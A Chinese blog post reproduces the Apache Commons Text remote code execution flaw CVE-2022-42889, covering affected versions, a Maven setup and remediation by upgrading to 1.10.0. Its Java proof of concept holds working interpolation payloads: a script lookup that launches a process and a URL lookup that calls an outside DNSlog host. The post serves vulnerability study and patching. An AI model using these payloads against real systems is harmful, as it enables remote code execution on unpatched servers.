-
CVE-2022-42889 Apache Commons Text远程代码执行漏洞复现
目录
0x01 声明:
仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x02 简介:
Apache Commons是Apache软件基金会的项目。Commons的目的是提供可重用的、开源的Java代码。Apache Commons提供了很多工具类库,几乎不依赖其他第三方的类库,接口稳定,集成简单,可以大大提高编码效率和代码质量。
0x03 漏洞概述:
Apache Commons Text 项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。10月13日,Apache发布安全公告,修复了Apache Commons Text中的一个远程代码执行漏洞(CVE-2022-42889)。Apache Commons Text版本1.5到1.9中,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。
0x04 影响版本:
1.5 <= Apache Commons Text 版本<= 1.9
0x05 环境搭建:
通过Maven导入jar包。
- <dependencies>
- <dependency>
- <groupId>org.apache.commonsgroupId>
- <artifactId>commons-configuration2artifactId>
- <version>2.7version>
- dependency>
- <dependency>
- <groupId>org.apache.commonsgroupId>
- <artifactId>commons-textartifactId>
- <version>1.9version>
- dependency>
- <dependency>
- <groupId>org.apache.commonsgroupId>
- <artifactId>commons-lang3artifactId>
- <version>3.12.0version>
- dependency>
- dependencies>
0x06 漏洞复现:
代码:
- package org.example;
- import org.apache.commons.text.StringSubstitutor;
- public class Main {
- public static void main(String[] args) {
- StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
- // String payload = interpolator.replace("${script:js:new java.lang.ProcessBuilder(\"calc\").start()}");
- String payload = interpolator.replace("${url:utf-8:http://owncjx.dnslog.cn}");
- interpolator.replace(payload);
- }
- }
命令执行:
DNSlog外带查询:
0x07 修复建议:
目前该漏洞已经修复,受影响用户可以升级到Apache Commons Text 1.10.0。
下载链接:
0x08 参考文档:
https://blog.csdn.net/qq_34101364/article/details/127338170
https://www.cnblogs.com/wh4am1/p/16795499.html
-
相关阅读:
Spring-----AOP面向切面
学习git博客
Maven项目管理(一)
中小企业数字化的“下半场”,与华为的生态伙伴“引力场”
DNS协议隧道(1)
Java基础 —— 项目一:ATM存取款系统
Mongodb认证入库并进行多版本缓存使用
hexo博客主题推荐
在Java中使用io实现TCP协议编程
契约锁集成近20种人事软件,助力HR网上签署“入转调离”文件
- 原文地址:https://blog.csdn.net/qq_44281295/article/details/127383312
https://commons.apache.org/proper/commons-text/download_text.cgi